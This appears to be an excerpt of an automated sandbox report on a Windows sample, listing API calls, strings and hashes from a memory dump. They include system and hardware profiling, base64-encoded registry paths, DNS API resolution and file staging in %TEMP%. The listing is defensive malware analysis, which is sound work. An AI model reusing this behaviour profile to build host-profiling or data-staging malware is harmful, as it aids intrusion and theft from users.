                  • GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                    • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeString$InfoSystem
                  • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                  • API String ID: 4070941872-1038824218
                  • Opcode ID: 2dd8e4a6275ba7105d358bdb5c43bd8b3ec4f76fd94b45c44828d9111afa6f11
                  • Instruction ID: 6ee615b5186dd69ea9a83c9e9698d3011ce36d6a126617133cf52e038528ef4b
                  • Opcode Fuzzy Hash: 2dd8e4a6275ba7105d358bdb5c43bd8b3ec4f76fd94b45c44828d9111afa6f11
                  • Instruction Fuzzy Hash: 9941F174A00108ABCB01EFD1D842FCDBBB9AF48305F51413BF504B7296D678EA468B59
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                  • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033BC
                  • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A212,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A212,00000000,?,00403436), ref: 004033C2
                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileHandleWrite$Message
                  • String ID: Error$Runtime error at 00000000
                  • API String ID: 1570097196-2970929446
                  • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                  • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                  • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                  • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                  APIs
                  • GetTickCount.KERNEL32 ref: 00411315
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                  • DeleteFileW.KERNEL32(00000000), ref: 00411544
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CopyCountDeleteTick
                  • String ID: $%TEMP%$.tmp
                  • API String ID: 2381671008-2792595090
                  • Opcode ID: db17063c9cae81f4128a538ccb0406a2e86b889ebd8fd8a46293cc642e6a25ee
                  • Instruction ID: 2907a0a36d16f86ef06436b94052184e29eddf1806116983537aed2fe47c33e4
                  • Opcode Fuzzy Hash: db17063c9cae81f4128a538ccb0406a2e86b889ebd8fd8a46293cc642e6a25ee
                  • Instruction Fuzzy Hash: 8C81F871A00109AFDB00EF95DC82EDEBBB9EF49305F508436F514F72A1DB38AA458B59
                  APIs
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040C0DE,?,00000000,?,00000000), ref: 0040BF04
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF0A
                  • LoadLibraryA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040BF5C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF79
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF8E
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BFA3
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID:
                  • API String ID: 2238633743-0
                  • Opcode ID: 2ffe15127e72428e329f6c17fb58ca033a35ff4ad75139793fd85c634e2280da
                  • Instruction ID: 0e090bdfc3d65a5bca4157f74653ebb500d09f599f80782c5ae309756f7fedfb
                  • Opcode Fuzzy Hash: 2ffe15127e72428e329f6c17fb58ca033a35ff4ad75139793fd85c634e2280da
                  • Instruction Fuzzy Hash: A661A9B5A00209DFDB00EFA5C881A9EB7BDFF49304B50457AE914F7391D638ED458BA8
                  APIs
                  • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                  • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                  • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                  • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                  • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                  • String ID:
                  • API String ID: 3782394904-0
                  • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                  • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                  • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                  • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                  APIs
                  • GetTickCount.KERNEL32 ref: 00410DCC
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                  • DeleteFileW.KERNEL32(00000000), ref: 00410F84
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CopyCountDeleteTick
                  • String ID: %TEMP%$.tmp
                  • API String ID: 2381671008-3650661790
                  • Opcode ID: a0f59b8e419c3aad363750f11b97e76979ee39233b08c3cc789eaf95a442bc53
                  • Instruction ID: ee23a472d3747a439df3c4e0a114333c5db2ab7a39ff8a49f746a70128ed8489
                  • Opcode Fuzzy Hash: a0f59b8e419c3aad363750f11b97e76979ee39233b08c3cc789eaf95a442bc53
                  • Instruction Fuzzy Hash: F0611A71A00109AFCB10EF95DC42ADEBBB8EF48315F504476F514F32A1DB79AE468B58
                  APIs
                  • GetTickCount.KERNEL32 ref: 00411078
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                  • DeleteFileW.KERNEL32(00000000), ref: 00411230
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CopyCountDeleteTick
                  • String ID: %TEMP%$.tmp
                  • API String ID: 2381671008-3650661790
                  • Opcode ID: 577b90d7f24cd0fb58febb8daef041d5e439a0dea1ca99fdd0a66268eb77198e
                  • Instruction ID: b158b585ad64a0e2cffbc60e29a794732e4ff4356334f001507f487ecad874f7
                  • Opcode Fuzzy Hash: 577b90d7f24cd0fb58febb8daef041d5e439a0dea1ca99fdd0a66268eb77198e
                  • Instruction Fuzzy Hash: E4611975A00109AFDB00EB95DC82ADEBBF8EF49314F504076F514F32A1DA38AE458B58
                  APIs
                  • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
                  • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: DnsQuery_A$dnsapi.dll$zwA
                  • API String ID: 2574300362-2265345817
                  • Opcode ID: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
                  • Instruction ID: a7d4bf9b2760dea35b02269f2c10af10878945f0623a8129c970236146844d6a
                  • Opcode Fuzzy Hash: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
                  • Instruction Fuzzy Hash: C2119070904604AED711DBA9CD52B9EBBF8DF49714F5140B7F804E72D2D6789E018B58
                  APIs
                  • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
                  • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: DnsQuery_A$dnsapi.dll$zwA
                  • API String ID: 2574300362-2265345817
                  • Opcode ID: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
                  • Instruction ID: ea46895599b20c27feb42da0d668784e66eeb00bbfd17c159799839ff483915a
                  • Opcode Fuzzy Hash: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
                  • Instruction Fuzzy Hash: 7111C470904604BED711DFA9CD42B8EBBF8DB45714F5140B7F804E72C1D6789E008B58
                  APIs
                  • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
                  • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: DnsQuery_A$dnsapi.dll$zwA
                  • API String ID: 2574300362-2265345817
                  • Opcode ID: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
                  • Instruction ID: e3f94ad17905d3749a36cc042419755c400cae35a044259d7baf032426d6234e
                  • Opcode Fuzzy Hash: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
                  • Instruction Fuzzy Hash: D01151B1A14608AED711DFAACD42B9EBBF8EB48714F514076F804E72C1E6789E008B58
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                  • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                  • API String ID: 3677997916-4173385793
                  • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                  • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                  • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                  • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CC7
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00415CCD
                    • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressFreeLibraryLoadProcString
                  • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                  • API String ID: 923276998-3878206809
                  • Opcode ID: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                  • Instruction ID: 391148e63b22df71c2771543718f35c183a5c4b34bdda626484a7ccee0bd3fce
                  • Opcode Fuzzy Hash: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                  • Instruction Fuzzy Hash: 55017571A006089BD711EBA1DD46BDE77B9EB88704F51453AF500B32D1E67C6D018659
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406684
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040668A
                  • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?), ref: 0040669B
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressCurrentHandleModuleProcProcess
                  • String ID: IsWow64Process$kernel32.dll
                  • API String ID: 4190356694-3024904723
                  • Opcode ID: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                  • Instruction ID: e294de711800d21e639c3a9fa9d3456d397d027599023024eec292f5251465af
                  • Opcode Fuzzy Hash: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                  • Instruction Fuzzy Hash: 1FE09BB16147019EDB007BB58C41B3B21CCAB65305F031C3EA082F12C0D97EC8908A6D
                  APIs
                  • GetTickCount.KERNEL32 ref: 00411315
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CopyCountFileTick
                  • String ID: %TEMP%$.tmp
                  • API String ID: 3448371392-3650661790
                  • Opcode ID: 2d5d7d5c0cd455ac35e8538cbdb34896a68ba153585d133ff5677ccfd955861b
                  • Instruction ID: 1a8257de2d60cbb0d3980c7fc3a6a2139cbe43d2aa84506a9aa105e6b37338cb
                  • Opcode Fuzzy Hash: 2d5d7d5c0cd455ac35e8538cbdb34896a68ba153585d133ff5677ccfd955861b
                  • Instruction Fuzzy Hash: 1B414231904248AFDB01FFA2D852ACDBBB9EF45309F51447BF500B76A2D63CAE058B25
                  APIs
                  • GetTickCount.KERNEL32 ref: 00411315
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CopyCountFileTick
                  • String ID: %TEMP%$.tmp
                  • API String ID: 3448371392-3650661790
                  • Opcode ID: 8b025c809ca5fcf52eb203aa6c1f0ec38d1a9fc9c4deca7b9c8dce6ee129aaff
                  • Instruction ID: e7bb21d7818b23da26e47d5e8aee7b9a5bdfdedc2a4558b21973e4c2dc324f20
                  • Opcode Fuzzy Hash: 8b025c809ca5fcf52eb203aa6c1f0ec38d1a9fc9c4deca7b9c8dce6ee129aaff
                  • Instruction Fuzzy Hash: 01413571904108AFDB01FFA2D842ACDBBB9EF45309F51447BF505B36A2D63CAE068A24
                  APIs
                  • GetTickCount.KERNEL32 ref: 00411315
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CopyCountFileTick
                  • String ID: %TEMP%$.tmp
                  • API String ID: 3448371392-3650661790
                  • Opcode ID: c1a497b4b0d046b719842a9b981a532eae9f015e020314dad747ec1315daf45e
                  • Instruction ID: 8afa6536208aa5b6f57682845dada9e2518f3e9b5e83f9eef4c4991f65faefc0
                  • Opcode Fuzzy Hash: c1a497b4b0d046b719842a9b981a532eae9f015e020314dad747ec1315daf45e
                  • Instruction Fuzzy Hash: 7F414631900108AFDB01FF92D842ACDFBB9EF44309F50447BF504B36A2D63CAE058A14
                  APIs
                  • GetTickCount.KERNEL32 ref: 00411078
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CopyCountFileTick
                  • String ID: %TEMP%$.tmp
                  • API String ID: 3448371392-3650661790
                  • Opcode ID: 7334c5f461cf658640640d1d52cc0bd0a3ff0b1e0655c4320245804e77c3ea22
                  • Instruction ID: 086439bef84ae03ebcf91c6f71c22103effc3d3d1ef1d95b9ffc13b6feb758dd
                  • Opcode Fuzzy Hash: 7334c5f461cf658640640d1d52cc0bd0a3ff0b1e0655c4320245804e77c3ea22
                  • Instruction Fuzzy Hash: 53315531904108AFDB01FFA1D942ADDBBB9EF49304F50447BF504B36A2D738AE069A58
                  APIs
                  • GetTickCount.KERNEL32 ref: 00411078
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CopyCountFileTick
                  • String ID: %TEMP%$.tmp
                  • API String ID: 3448371392-3650661790
                  • Opcode ID: 4f8e67243287949893c35c2c73810bd2e217d777a31600725d2df3b5b3d23b75
                  • Instruction ID: c9e68ca033382928e780bbb2ca05a045859d404701f4d2a11d4424a3b4ff7e89
                  • Opcode Fuzzy Hash: 4f8e67243287949893c35c2c73810bd2e217d777a31600725d2df3b5b3d23b75
                  • Instruction Fuzzy Hash: FA313531900109AEDB01FF91D942ADDBBB9EF48305F50457BF504B26A2D738AE059A58
                  APIs
                  • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesA,00000000,00415E07,?,-00000001,?,?,?,00415F5F,Video Info,?,004160A8,?,GetRAM: ,?), ref: 00415D8E
                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00415D94
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: EnumDisplayDevicesA$user32.dll
                  • API String ID: 2574300362-2278183399
                  • Opcode ID: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
                  • Instruction ID: 9dd9bdf3a8bde6cf78cd03fc344b6578603246f1cfb7de35a5983435c2d557c6
                  • Opcode Fuzzy Hash: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
                  • Instruction Fuzzy Hash: 3901A571A00708AEE7209F62CC41BDB77ADEBC5714F5180BAF508E2180DA785F408A69
                  APIs
                  • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                  • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                  • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                  • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                  • String ID:
                  • API String ID: 730355536-0
                  • Opcode ID: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
                  • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                  • Opcode Fuzzy Hash: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
                  • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                  APIs
                    • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C), ref: 0040E824
                  • DeleteFileW.KERNEL32(00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C,00000001,?), ref: 0040E866
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AllocCopyDeleteString
                  • String ID: %TEMP%\curbuf.dat
                  • API String ID: 5292005-3767633259
                  • Opcode ID: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
                  • Instruction ID: 82a9ed53c2a697d02335697899508965461685f21aee0589c72fe3466f83eb79
                  • Opcode Fuzzy Hash: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
                  • Instruction Fuzzy Hash: 4D211271A00209EBDB00FBA6D94299EB7B8EF44309F50897BF400B32D1D738AE11965D
                  APIs
                  • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                  • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                    • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                    • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                    • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                    • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                  • String ID: ^
                  • API String ID: 2227675388-551292248
                  • Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                  • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                  • Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                  • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C